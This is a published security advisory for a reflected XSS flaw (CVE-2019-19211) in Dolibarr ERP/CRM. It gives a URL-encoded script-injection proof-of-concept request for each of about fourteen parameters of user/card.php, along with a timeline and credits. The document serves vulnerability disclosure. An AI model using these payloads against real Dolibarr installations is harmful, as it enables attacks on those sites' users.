usd-2019-0053 | Dolibarr ERP/CRM ver. 3.0 – 10.0.4

Advisory ID: usd-2019-0053
CVE Number: CVE-2019-19211
Affected Product: Dolibarr ERP/CRM
Affected Version: 3.0 – 10.0.4
Vulnerability Type: Reflected XSS
Security Risk: High
Vendor URL: https://www.dolibarr.org/
Vendor Status: Fixed (not verified)

Description

Multiple parameters used by /dolibarr/htdocs/user/card.php are reflected without sufficient filtering.

Proof of Concept (PoC)

Vulnerable parameters: lastname, firstname, office_phone, user_mobile, office_fax, email, accountancy_code (id enabled), signature, job, thm, tjm, salary, weeklyhours.

The request should use proper URL encoding in order for the PoC to work. The request should use proper URL encoding in order for the PoC to work.
The following examples are correctly encoded:

signature:
/dolibarr/htdocs/user/card.php?id=2&action=create&signature=asdfgasdfasdf%22%3E%3C/textarea%3E%3Cscript%3Ealert(1)%3C/script%3E

lastname:
/dolibarr/htdocs/user/card.php?id=2&action=create&lastname=asdfgasdfasdf%22%3E%3C/textarea%3E%3Cscript%3Ealert(1)%3C/script%3E

firstname:
/dolibarr/htdocs/user/card.php?id=2&action=create&firstname=asdfgasdfasdf%22%3E%3C/textarea%3E%3Cscript%3Ealert(1)%3C/script%3E

office_phone:
/dolibarr/htdocs/user/card.php?id=2&action=create&office_phone=asdfgasdfasdf%22%3E%3C/textarea%3E%3Cscript%3Ealert(1)%3C/script%3E

user_mobile:
/dolibarr/htdocs/user/card.php?id=2&action=create&user_mobile=asdfgasdfasdf%22%3E%3C/textarea%3E%3Cscript%3Ealert(1)%3C/script%3E

office_fax:
/dolibarr/htdocs/user/card.php?id=2&action=create&office_fax=asdfgasdfasdf%22%3E%3C/textarea%3E%3Cscript%3Ealert(1)%3C/script%3E

email:
/dolibarr/htdocs/user/card.php?id=2&action=create&email=asdfgasdfasdf%22%3E%3C/textarea%3E%3Cscript%3Ealert(1)%3C/script%3E

job:
/dolibarr/htdocs/user/card.php?id=2&action=create&job=asdfgasdfasdf%22%3E%3C/textarea%3E%3Cscript%3Ealert(1)%3C/script%3E

weeklyhours:
/dolibarr/htdocs/user/card.php?id=2&action=create&weeklyhours=asdfgasdfasdf%22%3E%3C/textarea%3E%3Cscript%3Ealert(1)%3C/script%3E

modSalaries enabled:

thm:
/dolibarr/htdocs/user/card.php?id=2&action=create&thm=asdfgasdfasdf%22%3E%3C/textarea%3E%3Cscript%3Ealert(1)%3C/script%3E

tjm:
/dolibarr/htdocs/user/card.php?id=2&action=create&tjm=asdfgasdfasdf%22%3E%3C/textarea%3E%3Cscript%3Ealert(1)%3C/script%3E

salary:
/dolibarr/htdocs/user/card.php?id=2&action=create&salary=asdfgasdfasdf%22%3E%3C/textarea%3E%3Cscript%3Ealert(1)%3C/script%3E

modAccountancies enabled:

accountancy_code:
/dolibarr/htdocs/user/card.php?id=2&action=create&accountancy_code=asdfgasdfasdf%22%3E%3C/textarea%3E%3Cscript%3Ealert(1)%3C/script%3E

modAgenda enabled:

color:
/dolibarr/htdocs/user/card.php?id=2&action=create&color=asdfgasdfasdf%22%3E%3C/textarea%3E%3Cscript%3Ealert(1)%3C/script%3E

Fix

Filter user input according to its usage.

Timeline

2019-09-06 Vulnerability discovered by Daniel Hoffmann
2019-09-11 First contact with vendor
2019-10-30 Vendor released version 10.0.3; Retest not successful
2019-11-27 Vendor released version 10.0.4 which fixes the vulnerability (not verified)
2020-02-05 Security advisory released

Credits

This security vulnerability was discovered by Daniel Hoffmann of usd AG.

usd-2019-0053 | Dolibarr ERP/CRM ver. 3.0 – 10.0.4

Description

Proof of Concept (PoC)

Fix

Timeline

Credits

About usd Security Advisories

Disclaimer

usd HeroLab

LabNews

Security Advisories zu SONIX und SAP

The Surprising Complexity of Finding Known Vulnerabilities

Security Advisories zu Zimperium und FileCloud

Folgen Sie uns